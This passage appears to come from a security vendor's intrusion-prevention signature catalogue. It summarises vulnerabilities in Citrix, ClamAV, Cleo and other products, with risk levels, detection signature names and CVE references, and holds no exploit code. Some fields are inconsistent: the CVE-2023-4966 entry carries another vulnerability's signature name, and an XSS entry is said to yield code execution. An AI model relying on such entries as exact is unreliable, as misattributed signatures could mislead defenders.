https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-8193

Citrix-Code-Injection-CVE-2020-8194

About this vulnerability:

Code Injection vulnerability in Citrix

Risk:

High

First detected in:

sgpkg-ips-1262-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Citrix Application Delivery Controller;Citrix Gateway;Citrix SDWAN WANOP

Type:

Input Validation

Description:

There exists a code injection vulnerability in Citrix. Successful exploitation of this issue can result in unauthenticated remote code execution.

Situation:

HTTP_CRL-Citrix-Code-Injection-CVE-2020-8194

References:

CVE-2020-8194
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-8194

Citrix-Code-Injection-CVE-2023-3519

About this vulnerability:

A vulnerability in Citrix

Risk:

Critical

First detected in:

sgpkg-ips-1615-5242

Last changed:

sgpkg-ips-1615-5242

Platform:

Generic

Software:

Citrix Application Delivery Controller; Citrix Gateway

Type:

Input Validation

Description:

A code injection vulnerability has been reported in Citrix NetScaler ADC and NetScaler Gateway. Successful exploitation of this vulnerability can result in unauthenticated remote code execution.

Situation:

HTTP_CRL-Citrix-Code-Injection-CVE-2023-3519

References:

CVE-2023-3519
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-3519

Citrix-Cross-Site-Scripting-CVE-2020-8191

About this vulnerability:

Cross site scripting vulnerability in Citrix

Risk:

High

First detected in:

sgpkg-ips-1262-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Citrix Application Delivery Controller;Citrix Gateway;Citrix SDWAN WANOP

Type:

Cross-site Scripting

Description:

There exists a cross site scripting vulnerability in Citrix. Successful exploitation of this issue can result in unauthenticated remote code execution.

Situation:

HTTP_CRL-Citrix-Cross-Site-Scripting-CVE-2020-8191

References:

CVE-2020-8191
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-8191

Citrix-IMA-Service-Buffer-Overflow

About this vulnerability:

A buffer overflow vulnerability in Citrix IMA service detected

Risk:

High

First detected in:

sgpkg-ips-196-2032

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Citrix Access Essentials; Citrix Presentation Server; Citrix Desktop Server; Citrix MetaFrame Presentation Server

Type:

Buffer Overflow

Description:

There is a buffer overflow vulnerability in the Independent Management Architecture (IMA) service in various Citrix products. The service does not sufficiently validate user-supplied data received from the network. A crafted data packet may overflow a static buffer, which leads to execution of arbitrary code in the context of the IMA service. The service typically runs with SYSTEM privilege.

Situation:

Generic_CS-Citrix-IMA-Service-Buffer-Overflow

References:

CVE-2008-0356
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-0356

BID-27329
http://www.securityfocus.com/bid/27329

Citrix-MetaFrame-IMA-Authentication-Processing-Buffer-Overflow

About this vulnerability:

A Citrix MetaFrame IMA Authentication Processing Buffer Overflow vulnerability

Risk:

High

First detected in:

sgpkg-ips-1000-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Citrix MetaFrame

Type:

Buffer Overflow

Description:

A buffer overflow vulnerability in Citrix MetaFrame IMA Authentication which allows remote attackers to execute arbitrary code by sending a specially crafted packet to the IMA process on a vulnerable server.

Situation:

Generic_CS-Citrix-MetaFrame-IMA-Authentication-Processing-Buffer-Overflow

References:

CVE-2006-5821
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-5821

Citrix-NetScaler-Buffer-Overflow-Vulnerability-CVE-2023-4966

About this vulnerability:

An attempt to exploit a vulnerability in Citrix NetScaler detected

Risk:

High

First detected in:

sgpkg-ips-1646-5242

Last changed:

sgpkg-ips-1646-5242

Platform:

Generic

Software:

Citrix Application Delivery Controller;Citrix Gateway

Type:

Input Validation

Description:

Citrix NetScaler ADC and NetScaler Gateway contain a buffer overflow vulnerability that allows for sensitive information disclosure when configured as a Gateway (VPN virtual server, ICA Proxy, CVPN, RDP Proxy) or AAA virtual server.

Situation:

HTTP_CSH-Citrix-NetScaler-SD-WAN-CGISESSID-Command-Execution-CVE-2017-6316

References:

CVE-2023-4966
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-4966

Citrix-NetScaler-SD-WAN-CGISESSID-Command-Execution-CVE-2017-6316

About this vulnerability:

A vulnerability in Citrix NetScaler SD-WAN

Risk:

High

First detected in:

sgpkg-ips-1468-5242

Last changed:

sgpkg-ips-1468-5242

Platform:

Generic

Software:

Citrix SD-WAN

Type:

Input Validation

Description:

A command execution vulnerability has been reported in Citrix NetScaler SD-WAN and Citrix CloudBridge. A remote, unauthenticated attacker could use this vulnerability to execute arbitrary commands via a crafted CGISESSID or CAKEPHP cookie.

Situation:

References:

CVE-2017-6316
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-6316

Citrix-Path-Traversal-CVE-2019-19781

About this vulnerability:

A vulnerability in Citrix

Risk:

High

First detected in:

sgpkg-ips-1214-5242

Last changed:

sgpkg-ips-1621-5242

Platform:

Generic

Software:

Citrix Application Delivery Controller; Citrix Gateway

Type:

Malfunction

Description:

There exists a pre-auth path traversal vulnerability in Citrix Application Delivery Controller and Citrix Gateway. Successful exploitation could lead in arbitrary code execution.

Situation:

HTTP_CRL-Citrix-Path-Traversal-CVE-2019-19781
HTTP_CRH-Citrix-Path-Traversal-CVE-2019-19781
HTTP_CRH-Citrix-Path-Traversal-CVE-2019-19781-2

References:

CVE-2019-19781
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-19781

Citrix-Presentation-Server-IMA-Invalid-Event-Data-Length-DOS

About this vulnerability:

Denial of service vulnerability in Citrix Presentation server

Risk:

Moderate

First detected in:

sgpkg-ips-85-1314

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Citrix Presentation Server

Type:

Malfunction

Description:

There is a denial of service vulnerability in Citrix Presentation server due to a memory access violation. An unauthenticated attacker can send a malicious IMA protocol packet containing event data with a size of zero to the affected service, causing a denial of service.

Situation:

Generic_Citrix-Presentation-Server-IMA-Invalid-Event-Data-Length-DOS

References:

CVE-2006-5861
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-5861

BID-20986
http://www.securityfocus.com/bid/20986

OSVDB-30270
http://www.osvdb.org/30270

Citrix-Program-Neighborhood-Agent-Arbitrary-Shortcut-Creation

About this vulnerability:

A vulnerability in Citrix ICA Win32 Program Neighborhood Agent

Risk:

Moderate

First detected in:

sgpkg-ips-354-4219

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Citrix Program Neighborhood Agent

Type:

Malfunction

Description:

There exists an arbitrary shortcut creation vulnerability in the Citrix Program Neighborhood Agent. The problem can be triggered by sending a crafted XML response to an affected client. Successful exploitation can allow creation of arbitrary shortcuts which can result in code execution with the privileges of the current user.

Situation:

HTTP_SS-Citrix-Program-Neighborhood-Agent-Arbitrary-Shortcut-Creation
File-TextId_Citrix-Program-Neighborhood-Agent-Arbitrary-Shortcut-Creation

References:

CVE-2004-1077
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-1077

BID-13379
http://www.securityfocus.com/bid/13379

Citrix-Program-Neighborhood-Agent-Buffer-Overflow

About this vulnerability:

A vulnerability in Citrix ICA Win32 Program Neighborhood Agent

Risk:

High

First detected in:

sgpkg-ips-355-4219

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Citrix Program Neighborhood Agent

Type:

Buffer Overflow

Description:

There exists a buffer overflow vulnerability in the Citrix Program Neighborhood Agent. The problem can be triggered by sending a crafted XML response to the affected client. Successful exploitation can allow for arbitrary code execution with the privileges of the current user.

Situation:

HTTP_SS-Citrix-Program-Neighborhood-Agent-Buffer-Overflow
File-TextId_Citrix-Program-Neighborhood-Agent-Buffer-Overflow

References:

CVE-2004-1078
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-1078

BID-13373
http://www.securityfocus.com/bid/13373

Citrix-Provisioning-Services-Multiple-Opcodes-Integer-Underflow

About this vulnerability:

A vulnerability in Citrix Systems Provisioning Services

Risk:

Moderate

First detected in:

sgpkg-ips-438-4219

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Citrix Provisioning Services

Type:

Integer Overflow

Description:

There is an integer underflow vulnerability, which can cause a stack buffer overflow, in the PVS Stream Service (streamprocess.exe) component of Citrix Provisioning Service. The vulnerability is due to an error when copying a string into a stack buffer while handling a number of different opcodes. A remote, unauthenticated attacker could exploit this vulnerability by sending a malicious request to the target service. A successful attack may allow execution of arbitrary code on the target machine within the security context of the service, which is SYSTEM. If the attack is not successful, the vulnerable service may terminate abnormally, causing a denial-of-service condition.

Situation:

Generic_UDP-Citrix-Provisioning-Services-Multiple-Opcodes-Integer-Underflow
Generic_UDP-Citrix-Provisioning-Services-Multiple-Opcodes-Integer-Underflow-2

References:

BID-49803
http://www.securityfocus.com/bid/49803

Citrix-Provisioning-Services-Opcode-40020006-Integer-Underflow

About this vulnerability:	A vulnerability in Citrix Systems Provisioning Services
Risk:	Moderate
First detected in:	sgpkg-ips-436-4219
Last changed:	sgpkg-ips-1296-5242
Platform:	Generic
Software:	Citrix Provisioning Services
Type:	Integer Overflow
Description:	There is an integer underflow vulnerability, which can cause a stack buffer overflow, in the PVS Stream Service (streamprocess.exe) component of Citrix Provisioning Service. The vulnerability is due to an error when handling a specially crafted packet with opcode 0x40020006. A remote, unauthenticated attacker could exploit this vulnerability by sending a malicious request to the target service. A successful attack may allow execution of arbitrary code on the target machine within the security context of the service, which is SYSTEM. If the attack is not successful, the vulnerable service may terminate abnormally, causing a denial-of-service condition.
Situation:	Generic_Citrix-Provisioning-Services-Opcode-40020006-Integer-Underflow

Citrix-Provisioning-Services-Opcode-40020010-Stack-Buffer-Overflow

About this vulnerability:

An attempt to cause a buffer overflow in Citrix Provisioning Services

Risk:

High

First detected in:

sgpkg-ips-402-4219

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Citrix Provisioning Services

Type:

Buffer Overflow

Description:

A stack buffer overflow vulnerability exists in Citrix Provisioning Service. The vulnerability is due to an error when handling a specially crafted packet with Opcode 0x40020010 to the Provisioning Services server. A remote attacker could exploit this by sending a malicious packets to the target.

Situation:

Generic_Citrix-Provisioning-Services-Opcode-40020010-Stack-Buffer-Overflow

References:

BID-45914
http://www.securityfocus.com/bid/45914

OSVDB-70597
http://www.osvdb.org/70597

Citrix-Provisioning-Services-Streamprocess.exe-Stack-Buffer-Overflow

About this vulnerability:

A vulnerability in Citrix Provisioning Services

Risk:

High

First detected in:

sgpkg-ips-382-4219

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Citrix Provisioning Services

Type:

Buffer Overflow

Description:

A stack buffer overflow vulnerability exists in Citrix Provisioning Service. The vulnerability is due to a boundary error when handling a specially crafted packet to the Provisioning Services server. A remote attacker could exploit this by sending a malicious packets to the target. A successful attack may allow remote unauthenticated attackers to execute arbitrary code on the target machine within the security context of the service. If such an attack is not executed successfully, the vulnerable server may terminate abnormally.

Situation:

Generic_UDP-Citrix-Provisioning-Services-Streamprocess.exe-Stack-Buffer-Overflow

References:

BID-45914
http://www.securityfocus.com/bid/45914

Citrix-SD-WAN-Command-Injection-CVE-2019-12991

About this vulnerability:

A vulnerability in Citrix SD-WAN

Risk:

High

First detected in:

sgpkg-ips-1468-5242

Last changed:

sgpkg-ips-1468-5242

Platform:

Generic

Software:

Citrix SD-WAN

Type:

Input Validation

Description:

A command injection vulnerability has been reported in Citrix SD-WAN. Successful exploitation of this vulnerability can allow an authenticated attacker to execute arbitrary OS commands as root.

Situation:

HTTP_CRL-Citrix-SD-WAN-Command-Injection-CVE-2019-12991

References:

CVE-2019-12991
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-12991

Citrix-SD-WAN-SQL-Injection-CVE-2019-12989

About this vulnerability:

A vulnerability in Citrix SD-WAN

Risk:

High

First detected in:

sgpkg-ips-1468-5242

Last changed:

sgpkg-ips-1468-5242

Platform:

Generic

Software:

Citrix SD-WAN

Type:

Input Validation

Description:

An SQL injection vulnerability has been reported in Citrix SD-WAN. Successful exploitation of this vulnerability can allow an unauthenticated attacker to write and create files. This can lead to authentication bypass, which may allow the attacker to exploit CVE-2019-12991.

Situation:

HTTP_CRL-Citrix-SD-WAN-SQL-Injection-CVE-2019-12989

References:

CVE-2019-12989
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-12989

Citrix-ShareFile-Storage-Zones-Controller-Directory-Traversal

About this vulnerability:

A vulnerability in Citrix Systems ShareFile StorageZones Controller

Risk:

High

First detected in:

sgpkg-ips-1618-5242

Last changed:

sgpkg-ips-1618-5242

Platform:

Generic

Software:

Citrix Systems ShareFile StorageZones Controller

Type:

Directory Traversal

Description:

A directory traversal vulnerability has been reported in Citrix ShareFile Storage Zones Controller. The vulnerability is due to improper validation of user input in the ProcessRawPostedFile function. A remote, unauthenticated attacker could exploit this vulnerability by sending crafted requests to the target server. Successful exploitation could allow an attacker to save files to an arbitrary file path under the web root directory, which could lead to the execution of arbitrary code.

Situation:

HTTP_CRL-Citrix-ShareFile-Storage-Zones-Controller-Processrawpostedfile-Directory-Traversal

References:

CVE-2023-24489
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-24489

Citrix-ShareFile-Storage-Zones-Controller-Neatupload-Directory-Traversal

About this vulnerability:

A vulnerability in Citrix Systems ShareFile StorageZones Controller

Risk:

Moderate

First detected in:

sgpkg-ips-1392-5242

Last changed:

sgpkg-ips-1392-5242

Platform:

Generic

Software:

Citrix Systems ShareFile StorageZones Controller

Type:

Directory Traversal

Description:

There exists a directory traversal vulnerability in the NeatUpload library of Citrix ShareFile Storage Zones Controller. Successful exploitation could lead in arbitrary code execution.

Situation:

HTTP_CRL-Citrix-ShareFile-Storage-Zones-Controller-Neatupload-Directory-Traversal

References:

CVE-2021-22941
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-22941

Citrix-Virtual-Apps-And-Desktops-Insecure-Deserialization-CVE-2024-8069

About this vulnerability:

A vulnerability in Citrix Virtual Apps and Desktops

Risk:

High

First detected in:

sgpkg-ips-1800-5242

Last changed:

sgpkg-ips-1800-5242

Platform:

Generic

Software:

Citrix Virtual Apps and Desktops

Type:

Malfunction

Description:

A remote code execution vulnerability has been reported in the Session Recording component of Citrix Virtual Apps and Desktops. This vulnerability is due to an exposed MSMQ functionality, allowing for user-supplied objects to be deserialized with the insecure BinaryFormatter class.

Situation:

HTTP_CS-Ysoserial-Generated-DotNet-Serialized-Object-In-A-MSMQ-Message

References:

CVE-2024-8069
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-8069

Citrix-XenApp-And-Xendesktop-Xml-Service-Interface-Uninitialized-Pointer

About this vulnerability:

A vulnerability in Citrix Systems Presentation Server

Risk:

Moderate

First detected in:

sgpkg-ips-413-4219

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Citrix Presentation Server; Citrix XenApp

Type:

Malfunction

Description:

A code execution vulnerability exists in Citrix XenApp and XenDesktop server. The vulnerability is caused by accessing an uninitialized pointer in the XML Service interface when processing crafted requests with a malformed URI. A remote unauthenticated attacker could exploit this vulnerability by sending specially crafted packet to the affected service. Successful exploitation could result in code execution with privileges of the XenApp and XenDesktop service account.

Situation:

HTTP_CRL-Citrix-XenApp-Xendesktop-Xml-Service-Interface-Uninitialized-Pointer

References:

OSVDB-74158
http://www.osvdb.org/74158

Citrix-XenApp-XML-Service-Interface-Stack-Buffer-Overflow

About this vulnerability:

A vulnerability in Citrix Systems Presentation Server

Risk:

Moderate

First detected in:

sgpkg-ips-410-4219

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Citrix Presentation Server; Citrix XenApp

Type:

Buffer Overflow

Description:

A code execution vulnerability exists in Citrix XenApp and XenDesktop server. The vulnerability is caused by a stack buffer overflow in the XML Service interface when processing crafted packets with an overly long password field. A remote unauthenticated attacker could exploit this vulnerability by sending specially crafted packet to the affected service. Successful exploitation could result in code execution with privileges of the XenApp and XenDesktop service account.

Situation:

HTTP_CS-Citrix-XenApp-XML-Service-Interface-Stack-Buffer-Overflow

References:

BID-48898
http://www.securityfocus.com/bid/48898

OSVDB-74157
http://www.osvdb.org/74157

Clam-AntiVirus-TNEF-Decoding-Denial-Of-Service

About this vulnerability:

Denial of service vulnerability in the TNEF decoding in Clam AntiVirus

Risk:

Moderate

First detected in:

sgpkg-ips-57-1210

Last changed:

sgpkg-ips-1296-5242

Platform:

Linux

Software:

ClamAV

Type:

Malfunction

Description:

ClamAV AntiVirus is an open source anti-virus product. The product fails to properly validate TNEF (Transport Neutral Encapsulation Format) encoded data. If the object length value of TNEF data block is negative, it is possible that the product processes the same data block infinitely, resulting in a denial of service condition.

Situation:

E-Mail_BS-Clam-AntiVirus-TNEF-Decoding-Denial-Of-Service
File-Binary_Clam-AntiVirus-TNEF-Decoding-Denial-Of-Service

References:

CVE-2005-3500
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-3500

BID-15316
http://www.securityfocus.com/bid/15316

OSVDB-20483
http://www.osvdb.org/20483

Clamav-AntiVirus-Check-JPEG-Exploit-Function-Denial-Of-Service

About this vulnerability:

A denial of service vulnerability in ClamAV AntiVirus

Risk:

High

First detected in:

sgpkg-ips-190-2032

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

ClamAV

Type:

Malfunction

Description:

There is a buffer overflow vulnerability in ClamAV AntiVirus. The vulnerability can be triggered when the application processes crafted JPEG files. An unauthenticated attacker can exploit this vulnerability by delivering a crafted file to the scanning service, resulting in an unchecked recursion that consumes the stack and causes a Denial of Service condition.

Situation:

HTTP_SS-Clamav-AntiVirus-Check-JPEG-Exploit-Function-Denial-Of-Service
File-JPEG_Clamav-AntiVirus-Check-JPEG-Exploit-Function-Denial-Of-Service
File-Binary_Clamav-AntiVirus-Check-JPEG-Exploit-Function-Denial-Of-Service

References:

CVE-2008-5314
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-5314

BID-32555
http://www.securityfocus.com/bid/32555

OSVDB-50363
http://www.osvdb.org/50363

Clamav-AntiVirus-CHM-File-Handling-Denial-Of-Service

About this vulnerability:

A denial of service vulnerability in ClamAV antivirus

Risk:

Moderate

First detected in:

sgpkg-ips-174-2032

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

ClamAV

Type:

Input Validation

Description:

There is a denial of service vulnerability in ClamAV AntiVirus. The vulnerability can be triggered when the application processes a crafted CHM file. An unauthenticated attacker can exploit this vulnerability by delivering a crafted file to the scanning engine to cause a denial of service.

Situation:

HTTP_SS-Clamav-AntiVirus-CHM-File-Handling-Denial-Of-Service
File-Binary_Clamav-AntiVirus-CHM-File-Handling-Denial-Of-Service

References:

CVE-2008-1389
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-1389

BID-30994
http://www.securityfocus.com/bid/30994

Clamav-DMG-CLI_scandmg-External-Entity-Injection

About this vulnerability:

A vulnerability in ClamAV Project ClamAV

Risk:

Moderate

First detected in:

sgpkg-ips-1580-5242

Last changed:

sgpkg-ips-1580-5242

Platform:

Generic

Software:

ClamAV

Type:

Malfunction

Description:

An incorrect XML parser configuration for parsing DMG files causes an external entity injection vulnerability in ClamAV. A successful exploit allows an attacker to read the contents of arbitrary files on the target system.

Situation:

File-Binary_Clamav-DMG-CLI_scandmg-External-Entity-Injection

References:

CVE-2023-20052
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-20052

Clamav-Encrypted-PDF-File-Handling-Memory-Access-Error

About this vulnerability:

A vulnerability in ClamAV Project ClamAV

Risk:

Moderate

First detected in:

sgpkg-ips-527-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

ClamAV

Type:

Malfunction

Description:

A memory access error exists in ClamAV antivirus. The vulnerability is due to a PDF key length computation error in "pdf.c" while parsing crafted encrypted PDF files. A remote attacker could exploit this vulnerability by causing ClamAV to process a specially crafted PDF file. Successful exploitation would terminate the clamd service resulting in a denial of service condition.

Situation:

File-PDF_Clamav-Encrypted-PDF-File-Handling-Memory-Access-Error

References:

CVE-2013-2021
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-2021

BID-59434
http://www.securityfocus.com/bid/59434

OSVDB-92835
http://www.osvdb.org/92835

Clamav-Initialize_Encryption_Key_-Out-Of-Bounds-Read

About this vulnerability:

A vulnerability in ClamAV Project ClamAV

Risk:

Moderate

First detected in:

sgpkg-ips-1694-5242

Last changed:

sgpkg-ips-1694-5242

Platform:

Generic

Software:

ClamAV

Type:

Malfunction

Description:

Improper string termination parsing causes an out of bounds read vulnerability in ClamAV. A successful exploit allows an attacker to cause a denial of service situation on the target system.

Situation:

File-OLE_Clamav-Initialize_Encryption_Key_-Out-Of-Bounds-Read

References:

CVE-2024-20290
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-20290

Clamav-libclamav-MEW-PE-File-Handling-Integer-Overflow

About this vulnerability:

A vulnerability in ClamAV

Risk:

High

First detected in:

sgpkg-ips-138-2032

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

ClamAV

Type:

Buffer Overflow

Description:

There is a buffer overflow vulnerability in the ClamAV AntiVirus product. The vulnerability can be triggered when the application processes crafted PE files. An unauthenticated attacker can exploit this vulnerability by delivering a crafted file to the scanning service, resulting in injection and execution of arbitrary code.

Situation:

HTTP_SS-Clamav-libclamav-MEW-PE-File-Handling-Integer-Overflow
File-Exe_Clamav-libclamav-MEW-PE-File-Handling-Integer-Overflow

References:

CVE-2007-6335
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-6335

BID-26927
http://www.securityfocus.com/bid/26927

Clamav-Ole2-Uniq_Add-Out-of-Bounds-Write

About this vulnerability:

A vulnerability in ClamAV

Risk:

Moderate

First detected in:

sgpkg-ips-1152-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

ClamAV

Type:

Malfunction

Description:

There has been reported an out-of-bounds write vulnerability in ClamAV. Successful exploitation could lead in denial of service conditions or arbitrary code execution.

Situation:

File-OLE_Clamav-Ole2-Uniq_Add-Out-of-Bounds-Write

References:

CVE-2019-1788
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-1788

Clamav-UPX-File-Handling-Buffer-Overflow

About this vulnerability:

A vulnerability in ClamAV

Risk:

Moderate

First detected in:

sgpkg-ips-973-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

ClamAV

Type:

Malfunction

Description:

There exists a buffer overflow vulnerability in ClamAV antivirus product. A remote attacker can use this to execute arbitrary code on the affected system.

Situation:

File-Exe_Clamav-UPX-File-Handling-Buffer-Overflow

References:

CVE-2005-2920
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-2920

BID-14866
http://www.securityfocus.com/bid/14866

Clamav-UPX-File-Handling-Heap-Overflow

About this vulnerability:

A vulnerability in ClamAV Project ClamAV

Risk:

Moderate

First detected in:

sgpkg-ips-436-4219

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

ClamAV

Type:

Buffer Overflow

Description:

There is a heap buffer overflow vulnerability in the ClamAV AntiVirus product. The vulnerability can be triggered when the application processes crafted UPX files. An unauthenticated attacker can exploit this vulnerability by delivering a crafted file to the scanning service resulting in injection and execution of arbitrary code. In a simple attack case aimed at creating a denial of service condition, the affected ClamAV daemon will terminate. In a sophisticated attack scenario where the malicious user is successful in injecting and executing supplied code, the behaviour of the system is dependent on the nature of the injected code. Any code injected into the vulnerable component would execute in the security context of the affected ClamAV daemon.

Situation:

File-Exe_Clamav-UPX-File-Handling-Heap-Overflow

References:

CVE-2006-4018
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-4018

BID-19381
http://www.securityfocus.com/bid/19381

Clamav-UPX-File-Handling-Integer-Overflow

About this vulnerability:

A vulnerability in ClamAV Clam AntiVirus

Risk:

High

First detected in:

sgpkg-ips-649-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

ClamAV

Type:

Integer Overflow

Description:

An integer overflow vulnerability exists in ClamAV antivirus software. The vulnerability is due to an error in "upx.c" while parsing UPX-packed executable files. A remote attacker could exploit this vulnerability to cause a denial of service condition on the target system.

Situation:

File-Exe_Clamav-UPX-File-Handling-Integer-Overflow

References:

CVE-2015-2170
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-2170

Clamav-UPX-File-PE-Parsing-Memory-Access-Error

About this vulnerability:

A vulnerability in ClamAV Project ClamAV

Risk:

High

First detected in:

sgpkg-ips-539-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

ClamAV

Type:

Malfunction

Description:

A memory access error vulnerability exists in ClamAV antivirus software. The vulnerability is due to an errors in "pe.c" while parsing UPX-packed executable files. Remote attackers could exploit the vulnerability to cause a denial of service condition.

Situation:

File-Exe_Clamav-UPX-File-PE-Parsing-Memory-Access-Error

References:

CVE-2013-2020
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-2020

BID-59434
http://www.securityfocus.com/bid/59434

OSVDB-92834
http://www.osvdb.org/92834

Clamav-Virusevent-Command-Injection

About this vulnerability:

A vulnerability in ClamAV

Risk:

Moderate

First detected in:

sgpkg-ips-1692-5242

Last changed:

sgpkg-ips-1692-5242

Platform:

Generic

Software:

ClamAV

Type:

Input Validation

Description:

Improper handling of input used to generate command strings causes a command injection vulnerability in ClamAV. A successful exploit may allow an attacker to execute arbitrary commands on the target system.

Situation:

HTTP_SHS-Clamav-Virusevent-Command-Injection

References:

CVE-2024-20328
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-20328

Clampi-Bot

About this vulnerability:	Clampi Bot
Risk:	High
First detected in:	sgpkg-ips-618-5211
Last changed:	sgpkg-ips-1296-5242
Platform:	Windows
Software:	<os>
Type:	Code Injection
Description:	Clampi is a Bot used to steal credentials and passwords from the infected machine.
Situation:	HTTP_CS-Clampi-Bot-Traffic

Claymore-Dual-GPU-Miner-Format-String-DOS-Attack

About this vulnerability:

A Claymore Dual GPU Miner Format String DOS Attack Vulnerability

Risk:

High

First detected in:

sgpkg-ips-1075-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows; Linux

Software:

Claymore Dual GPU Miner

Type:

Input Validation

Description:

A vulnerability in Claymore Dual GPU Miner, versions 10.5 and below, which allows remote attackers to read memory addresses or immediately terminate mining processes causing a denial of service condition, due to the lack of input validation.

Situation:

Generic_CS-Claymore-Dual-GPU-Miner-Format-String-DOS-Attack

References:

CVE-2018-6317
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-6317

ClearSCADA-DBServer-Denial-Of-Service

About this vulnerability:	ClearSCADA DBServer DOS and potential sensitive information disclosure.
Risk:	High
First detected in:	sgpkg-ips-628-5211
Last changed:	sgpkg-ips-1453-5242
Platform:	Windows
Software:	Schneider Electric ClearSCADA
Type:	Malfunction
Description:	A vulnerability in ClearSCADA DBServer where a remote attacker can send an SQL query, accessing the table by scheme, causing the DBServer to produce an exception. This creates a condition where the WebX on port 81 allows access to sensitive information without authroization.
Situation:	File-TextId_ClearSCADA-DBServer-Denial-Of-Service

Clearsearch

About this vulnerability:	ClearSearch
Risk:	Low
First detected in:	sgpkg-ips-615-5211
Last changed:	sgpkg-ips-1296-5242
Platform:	Windows
Software:	ClearSearch
Type:	Misconfiguration
Description:	ClearSearch is a Trojan adware. It is considered a potentially unwanted program.
Situation:	HTTP_CSU-Clearsearch HTTP_CSH-Clearsearch

Cleo-Vltrader-Harmony-And-Lexicom-Arbitrary-File-Write-CVE-2024-50623

About this vulnerability:

A vulnerability in Cleo VLTrader

Risk:

Critical

First detected in:

sgpkg-ips-1811-5242

Last changed:

sgpkg-ips-1811-5242

Platform:

Generic

Software:

Cleo VLTrader

Type:

Directory Traversal

Description:

An arbitrary file read and write vulnerability in Cleo VLTrader, Harmony, and LexiCom allows unauthenticated remote code execution via a crafted HTTP request.

Situation:

HTTP_CSH-Cleo-Vltrader-Harmony-And-Lexicom-Arbitrary-File-Write-CVE-2024-50623

References:

CVE-2024-50623
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-50623

Cleo-Vltrader-Harmony-And-Lexicom-Arbitrary-File-Write-CVE-2024-55956

About this vulnerability:

An attempt to exploit a vulnerability in Cleo VLTrader detected

Risk:

High

First detected in:

sgpkg-ips-1813-5242

Last changed:

sgpkg-ips-1813-5242

Platform:

Generic

Software:

Cleo VLTrader

Type:

Input Validation

Description:

In Cleo Harmony before 5.8.0.24, VLTrader before 5.8.0.24, and LexiCom before 5.8.0.24, an unauthenticated user can import and execute arbitrary Bash or PowerShell commands on the host system by leveraging the default settings of the Autorun directory.

Situation:

HTTP_CS-Cleo-Vltrader-Harmony-And-Lexicom-Arbitrary-File-Write-CVE-2024-55956

References:

CVE-2024-55956
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-55956

Clever-Internet-ActiveX-Suite-Arbitary-File-Overwrite

About this vulnerability:

Arbitary file download and overwrite vulnerability in Clever Internet ActiveX Suite

Risk:

Moderate

First detected in:

sgpkg-ips-115-2032

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Clever Internet ActiveX Suite

Type:

Input Validation

Description:

There is a vulnerability in Clever Internet ActiveX Suite. The vulnerability is due to a lack of input validation while processing user-supplied parameters for the ActiveX control. The vulnerability allows attacker to download and overwrite arbitrary files from the local system.

Situation:

HTTP_SS-Clever-Internet-ActiveX-Suite-Arbitary-File-Overwrite
File-Text_Clever-Internet-ActiveX-Suite-Arbitary-File-Overwrite

References:

CVE-2007-4067
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-4067

BID-25063
